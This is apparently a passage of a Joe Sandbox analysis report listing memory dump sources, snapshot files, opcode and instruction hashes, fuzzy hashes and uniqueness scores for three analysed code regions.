                                                                                                                                                    • Opcode Fuzzy Hash: 6d0f2ad02ec950388d8ff7bcc5b891017d3c77a8c83b1ea61ec5581c82a953f5
                                                                                                                                                    • Instruction Fuzzy Hash: 3521D276404284DFDF06CF54D9C0B26BF72FB88314F2486A9D9484B616C33AD516CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.412921043.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_184d000_file.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7d3108c6bf2a9d331893f602371122431582fc364a899f2b490910c32b123bfe
                                                                                                                                                    • Instruction ID: 89b47edf8fc7112744aa45e84008f6dce5e3dc4ee60edb4393c0560eb5e1db56
                                                                                                                                                    • Opcode Fuzzy Hash: 7d3108c6bf2a9d331893f602371122431582fc364a899f2b490910c32b123bfe
                                                                                                                                                    • Instruction Fuzzy Hash: 9F11B176404284CFCF12CF54D9C4B16BF71FB98328F2486A9E9054B616C73AD556CBA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.413488179.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_18b0000_file.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Xk
                                                                                                                                                    • API String ID: 0-3138398234
                                                                                                                                                    • Opcode ID: e37c0461a45ffcc0f2010d742dec3ce2d2f70de74d6cbaa5661d5e0c24cade33
                                                                                                                                                    • Instruction ID: 4fa9c0ac66518665ebc417c2a1b0fe6367358cf499c88ca558c332a3608b1bdd
                                                                                                                                                    • Opcode Fuzzy Hash: e37c0461a45ffcc0f2010d742dec3ce2d2f70de74d6cbaa5661d5e0c24cade33
                                                                                                                                                    • Instruction Fuzzy Hash: DCD1C274B002158FDB14DB78D894AAE7BF6AF89304B1580A9EA06CB791DF34DD06CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%